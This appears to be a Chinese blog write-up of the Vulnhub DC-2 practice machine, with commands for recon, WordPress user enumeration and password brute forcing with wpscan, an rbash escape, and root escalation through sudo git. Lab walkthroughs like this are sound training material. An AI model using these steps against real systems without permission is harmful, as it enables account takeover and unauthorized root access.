Vulnhub靶场-DC-2靶机练习

Vulnhub-DC-2

daoyuan

零、环境配置

1、虚拟机:vmware 15.5.6

2、攻击环境:kali linux 2020.3 192.168.143.128

3、靶机:DC-2

靶机直接从虚拟机wmware中打开,注意将网络适配器改为nat模式。

一、信息收集

1、主机存活扫描

arp-scan -l 

在这里插入图片描述

2、端口扫描

nmap -A -p- 192.168.143.135
发现开放的端口以及服务
80 wordpress
7744 ssh

在这里插入图片描述

3、脚本扫描

nmap --script=vuln 192.168.143.135

探测到网站CMS为wordpress,且有三个账号
admin
tom
jerry

在这里插入图片描述

二、漏洞探测

访问网站ip,无法显示,但网址栏解析域名为dc-2,
猜想是域名定向问题,直接在本地将ip与域名绑定。
sudo vim /etc/hosts

在这里插入图片描述
在这里插入图片描述

重新登入,可以访问,提示flag
flag1提示
提示一、需要cewl,百度cewl是啥~
提示二、一个账号不能找到就换一个

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

用cewl生成密码字典
cewl dc-2 > dc2.txt

在这里插入图片描述

用针对wordpress的扫描工具wordscan探测该域名
wpscan –-url http://dc-2 -e u //爆破用户名

扫描到网站有三个账号
admin
tom
jerry
在root目录下创建文档dc2.txt写入用户名字典

在这里插入图片描述在这里插入图片描述

在这里插入图片描述

三、漏洞利用

wpscan --url http://dc-2 -U dc2u.txt -P dc2.txt  //利用wpscan爆破密码
 爆破出密码
 Username: jerry, Password: adipiscing
 Username: tom, Password: parturient

在这里插入图片描述

在这里插入图片描述

nikto -h http://dc-2  //网站敏感页面扫描
找到账号登入界面/wp-login.php

在这里插入图片描述在这里插入图片描述

登入账号得到 flag2,提示。。。。。。不知道它说什么

在这里插入图片描述

ssh账号密码远程登入
ssh jerry@192.168.143.135 -p 7744
echo $0 //查看权限 rbash
ls 
发现flag3 cat不可查看 

在这里插入图片描述

rbash是受限制的shell,这里设法绕过rbash 
BASH_CMDS[a]=/bin/sh;a
/bin/bash

export PATH=$PATH:/bin/  #添加环境变量
export PATH=$PATH:/usr/bin  #使用cat命令

cat flag3.txt
绕过了rbash限制,查看flag3,得到提示su

在这里插入图片描述

su jerry //切换用户

发现flag4

cat flag4.txt

提示 git提权

在这里插入图片描述

sudo -l
查看可执行命令
得到git有root权限免密

sudo git -p help config
!/bin/sh

得到root,查看最终的flag
cat flag5.txt

在这里插入图片描述
在这里插入图片描述
如有错误,烦请不吝赐教。
转载请注明出处!
https://blog.csdn.net/qq_44877412
QQ:508173407

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值